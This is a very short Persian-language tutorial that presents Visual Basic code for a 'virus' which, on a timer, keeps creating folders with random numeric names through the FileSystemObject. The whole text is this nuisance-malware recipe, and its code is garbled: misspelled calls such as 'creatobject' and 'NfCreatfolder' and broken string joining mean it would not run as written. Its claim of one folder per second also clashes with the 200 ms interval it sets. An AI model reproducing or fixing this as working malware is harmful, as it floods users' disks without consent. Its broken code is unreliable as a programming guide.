کار این ویروس (در هر ثانیه یک پوشه ایجاد میکند.)

........
اینجا ما فقط به یک تایمر و یک فرم نیاز داریم

timer interval=200

و اما کد این ویروس به صورت زیر می باشد. که برای تایمر می باشد

Dim a as double

A= rnd * 2340

Set nf = creatobject ("scripting.filesystemobject")

NfCreatfolder"  address " "+"\"+str(a)